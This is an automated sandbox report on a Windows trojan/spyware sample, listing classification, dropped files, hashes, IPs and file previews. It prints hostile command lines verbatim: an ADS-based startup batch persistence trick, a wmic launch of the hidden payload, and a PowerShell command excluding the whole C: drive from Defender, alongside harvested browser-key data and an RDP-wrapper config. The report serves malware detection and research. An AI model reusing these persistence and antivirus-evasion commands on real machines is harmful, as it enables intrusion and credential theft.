                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:40
                        Number of new started drivers analysed:3
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HDC Information:
                        • Successful, ratio: 44.8% (good quality ratio 44.4%)
                        • Quality average: 86.8%
                        • Quality standard deviation: 21.1%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 64
                        • Number of non-executed functions: 155
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Execution Graph export aborted for target images.exe, PID 6516 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        12:33:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat
                        12:33:27API Interceptor1x Sleep call for process: WMIC.exe modified
                        12:33:28API Interceptor854x Sleep call for process: cmd.exe modified
                        12:33:44API Interceptor50x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        23.227.202.157SecuriteInfo.com.Variant.Lazy.183857.17696.exeGet hashmaliciousBrowse

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          HVC-ASUSQq5ciT0MpRGet hashmaliciousBrowse
                          • 107.155.88.141
                          invoice_pdf_125.isoGet hashmaliciousBrowse
                          • 23.227.203.120
                          SecuriteInfo.com.Variant.Lazy.183857.17696.exeGet hashmaliciousBrowse
                          • 23.227.202.157
                          GatewayService.exeGet hashmaliciousBrowse
                          • 104.156.51.181
                          boat.armGet hashmaliciousBrowse
                          • 46.21.151.187
                          21899963262.xlsbGet hashmaliciousBrowse
                          • 23.227.199.109
                          21899963262.xlsbGet hashmaliciousBrowse
                          • 23.227.199.109
                          sora.armGet hashmaliciousBrowse
                          • 23.227.187.69
                          ramest.dllGet hashmaliciousBrowse
                          • 23.227.203.120
                          PAYMENT_SWIFT-MT103.htmlGet hashmaliciousBrowse
                          • 46.21.153.133
                          5nVzMAV6qtGet hashmaliciousBrowse
                          • 66.232.127.255
                          https://bit.ly/3KP8fJGGet hashmaliciousBrowse
                          • 23.227.193.162
                          https://luka-petek.com/backagain/home/Get hashmaliciousBrowse
                          • 37.1.209.132
                          oblot.dllGet hashmaliciousBrowse
                          • 23.227.203.120
                          oblot.dllGet hashmaliciousBrowse
                          • 23.227.203.120
                          ramest.dllGet hashmaliciousBrowse
                          • 23.227.203.120
                          ramest.dllGet hashmaliciousBrowse
                          • 23.227.203.120
                          oblot.dllGet hashmaliciousBrowse
                          • 23.227.203.120
                          oblot.dllGet hashmaliciousBrowse
                          • 23.227.203.120
                          3wU3EeiE62Get hashmaliciousBrowse
                          • 23.239.174.247

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Program Files\Microsoft DN1\sqlmap.dllSOA & UNPAID INVOICES.pdf.exeGet hashmaliciousBrowse
                            Suvhviwivhrjbykcqcwltjbuuplxoiafsc.exeGet hashmaliciousBrowse
                              SecuriteInfo.com.Variant.Lazy.183857.17696.exeGet hashmaliciousBrowse
                                request..exeGet hashmaliciousBrowse
                                  24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.W32.AIDetectNet.01.26190.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.W32.AIDetectNet.01.25523.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.W32.AIDetectNet.01.18574.exeGet hashmaliciousBrowse
                                          sat#U0131nalma sipari#U015fi 4503995683.exeGet hashmaliciousBrowse
                                            PO 202204TR.exeGet hashmaliciousBrowse
                                              Scan-file-09267992827627.exeGet hashmaliciousBrowse
                                                Nuevo pedido actualizad.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.GenericKD.39486000.3897.exeGet hashmaliciousBrowse
                                                    N2L7ikW1cK.exeGet hashmaliciousBrowse
                                                      DHL_119040 receipt document.exeGet hashmaliciousBrowse
                                                        yrokkcTZj4.exeGet hashmaliciousBrowse
                                                          PO-11698 SLUB-DRAWING.pdf.exeGet hashmaliciousBrowse
                                                            Doc_DELIVERY_89099388889904038838727.exeGet hashmaliciousBrowse
                                                              Purchase order PL0028.exeGet hashmaliciousBrowse
                                                                D7CfYxusMr6xkTb.exeGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Program Files\Microsoft DN1\rdpwrap.ini

                                                                  Download File
                                                                  Process:C:\ProgramData\images.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):253693
                                                                  Entropy (8bit):5.4435816594509685
                                                                  Encrypted:false
                                                                  SSDEEP:768:NUiQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb5x8Rr/d6gl/+f8jZ0ftlFi4x7Qc:WJ33L+MoIiG4IvREWddadl/FY
                                                                  MD5:4997128EF0ECA4C4696BF4177FF3AFF5
                                                                  SHA1:7DD50F7BE34F25D580378A84B8F11A08F7EE8D1F
                                                                  SHA-256:C59A7CF7B08FA7F79C51CA9126300B32FCEECE6972A9E8837D384804FD613E24
                                                                  SHA-512:70DABDCDAE178CFB3D22EE2B00EBB747D17504864E68550256C5EE74B8D17506F88C0F057C8B91E666146B6E758C6C10EEDC123C871E2203C2BF5F67BD05EC66
                                                                  Malicious:false
                                                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2022-02-06..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                                                                  C:\Program Files\Microsoft DN1\sqlmap.dll

                                                                  Download File
                                                                  Process:C:\ProgramData\images.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):116736
                                                                  Entropy (8bit):5.884975745255681
                                                                  Encrypted:false
                                                                  SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                  MD5:461ADE40B800AE80A40985594E1AC236
                                                                  SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                  SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                  SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 49%, Browse
                                                                  • Antivirus: Metadefender, Detection: 20%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Joe Sandbox View:
                                                                  • Filename: SOA & UNPAID INVOICES.pdf.exe, Detection: malicious, Browse
                                                                  • Filename: Suvhviwivhrjbykcqcwltjbuuplxoiafsc.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.Variant.Lazy.183857.17696.exe, Detection: malicious, Browse
                                                                  • Filename: request..exe, Detection: malicious, Browse
                                                                  • Filename: 24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.W32.AIDetectNet.01.26190.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.W32.AIDetectNet.01.25523.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.W32.AIDetectNet.01.18574.exe, Detection: malicious, Browse
                                                                  • Filename: sat#U0131nalma sipari#U015fi 4503995683.exe, Detection: malicious, Browse
                                                                  • Filename: PO 202204TR.exe, Detection: malicious, Browse
                                                                  • Filename: Scan-file-09267992827627.exe, Detection: malicious, Browse
                                                                  • Filename: Nuevo pedido actualizad.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.Trojan.GenericKD.39486000.3897.exe, Detection: malicious, Browse
                                                                  • Filename: N2L7ikW1cK.exe, Detection: malicious, Browse
                                                                  • Filename: DHL_119040 receipt document.exe, Detection: malicious, Browse
                                                                  • Filename: yrokkcTZj4.exe, Detection: malicious, Browse
                                                                  • Filename: PO-11698 SLUB-DRAWING.pdf.exe, Detection: malicious, Browse
                                                                  • Filename: Doc_DELIVERY_89099388889904038838727.exe, Detection: malicious, Browse
                                                                  • Filename: Purchase order PL0028.exe, Detection: malicious, Browse
                                                                  • Filename: D7CfYxusMr6xkTb.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData:ApplicationData

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                  Category:modified
                                                                  Size (bytes):222720
                                                                  Entropy (8bit):7.862505245807072
                                                                  Encrypted:false
                                                                  SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                                                                  MD5:DABC6F0C75C134E5310BA3526ADBA833
                                                                  SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                                                                  SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                                                                  SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

                                                                  C:\ProgramData\images.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                  Category:dropped
                                                                  Size (bytes):222720
                                                                  Entropy (8bit):7.862505245807072
                                                                  Encrypted:false
                                                                  SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                                                                  MD5:DABC6F0C75C134E5310BA3526ADBA833
                                                                  SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                                                                  SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                                                                  SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

                                                                  C:\ProgramData\images.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14734
                                                                  Entropy (8bit):4.993014478972177
                                                                  Encrypted:false
                                                                  SSDEEP:384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
                                                                  MD5:C5A56B913DEEDCF5AE01A2D4F8AA69CE
                                                                  SHA1:C91D19BFD666FDD02B0739893833D4E1C0316511
                                                                  SHA-256:1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
                                                                  SHA-512:1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......#y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):21524
                                                                  Entropy (8bit):5.603674470472126
                                                                  Encrypted:false
                                                                  SSDEEP:384:itL6k0H6SVTDJ0Nr+RnYSBKnaul6GspE93G1u16zx5mHKHVY37bHjqIvUI++j/:r6gJlY4KaulKwG3xU+u7Lmly
                                                                  MD5:1492AC13C2B1E111C5C1164CAC260A7A
                                                                  SHA1:E674BAB629FFA7437600288ADA10F76C318C8BE4
                                                                  SHA-256:7093EAF8B4AEF9C1537F6D8E33993183D70CB3E90820901A7253C8DC2BFF12FF
                                                                  SHA-512:910A51D461442A23171DAA166446024609123C1521FDDDAE80966295FBAA04C6564404D9BDDC9A313E8E4F26B057315A709248F5B8621039B787EDE11C826FD3
                                                                  Malicious:false
                                                                  Preview:@...e.....................K.....N....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1iuid1f.5zn.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caqnsxdv.wy2.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oeqxrick.g20.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujlz1kts.jjg.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Roaming\GmCssxF.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\images.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.792852251086831
                                                                  Encrypted:false
                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):140
                                                                  Entropy (8bit):4.86129651314522
                                                                  Encrypted:false
                                                                  SSDEEP:3:QwZ2vOUrKaM6eNGRjDWXp5cViEaKC5SufyM1K/RFofD6tRQLRWLyLRHgn:QElPhxuWXp+NaZ5SuH1MUmt2FWLyS
                                                                  MD5:C2E52EDB9BA6919C7D9F3CF0B88221E2
                                                                  SHA1:9972112AF86B48E937E589E262D21BAD251A6010
                                                                  SHA-256:FAE189421B6E7CC977F1D2A69D712C97B22E810B0AE3F2F4E258E1112694C560
                                                                  SHA-512:FDDEDA3E5D597D086B9C4412621078B3D14B6624DF2B003CA3238E3BD03DE35AAF3E16F04339AC54B04A723F98E76F17D74263F7D1CCBCA92B6FD2C325014B3B
                                                                  Malicious:true
                                                                  Preview:for /F "usebackq tokens=*" %%A in ("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start") do %%A

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):59
                                                                  Entropy (8bit):4.2659637614761765
                                                                  Encrypted:false
                                                                  SSDEEP:3:eGAjGJwbZkREfcjMGERMQhM:ZuGJwi8cwGj
                                                                  MD5:579E29CEC6BDE04C5C074D8311D6B884
                                                                  SHA1:2FDFD4C6B8EB43A4C6F4C0D3998E4A5364221DFF
                                                                  SHA-256:65138897F467ADF9FE20594326D724D2CD5B437D9AACF5F83721AF340F70CE3C
                                                                  SHA-512:4011A9FD58C1DC8AA3ED79589D7232BBD06EB3FB32513D3C5B59B740ED89FDC9CCC9F3291812AFFF2CD679820BCD940AE3A49E41EBCBE20413821ACAD7C5191D
                                                                  Malicious:true
                                                                  Preview:wmic process call create '"C:\ProgramData:ApplicationData"'

                                                                  C:\Users\user\AppData\Roaming\pBlACIg.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\images.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):87165
                                                                  Entropy (8bit):6.102565506017432
                                                                  Encrypted:false
                                                                  SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                  MD5:CC02ABB348037609ED09EC9157D55234
                                                                  SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                  SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                  SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                  Malicious:false
                                                                  Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

                                                                  C:\Users\user\Documents\20220522\PowerShell_transcript.301389.NKMfFw_y.20220522123330.txt

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5048
                                                                  Entropy (8bit):5.391537877355324
                                                                  Encrypted:false
                                                                  SSDEEP:96:BZEh2N58qDo1ZiZDh2N58qDo1ZgM6UjZ1h2N58qDo1ZVFEEdZW:N8vd
                                                                  MD5:6845E5380ACF1B628551D90AE54909EF
                                                                  SHA1:B9C3A195360C41016D305960471481CA9DA3E94C
                                                                  SHA-256:3DEDBC9EE9E3D116C54885B6DBA56C67ACB7442EDD6DEFE55C5FF1B497D33E0C
                                                                  SHA-512:D9D9828E9A3426342ECAA3F9D2E4938DFC939B66BE9FDF358C4D5B0083AAFCE00729CE5160C9839E06F071C8DC459F01E14F5EFD01218A57EDA917CD9CB4DF5F
                                                                  Malicious:false
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123355..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6732..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123356..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123738..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                                  C:\Users\user\Documents\20220522\PowerShell_transcript.301389.c9F2HF06.20220522123314.txt

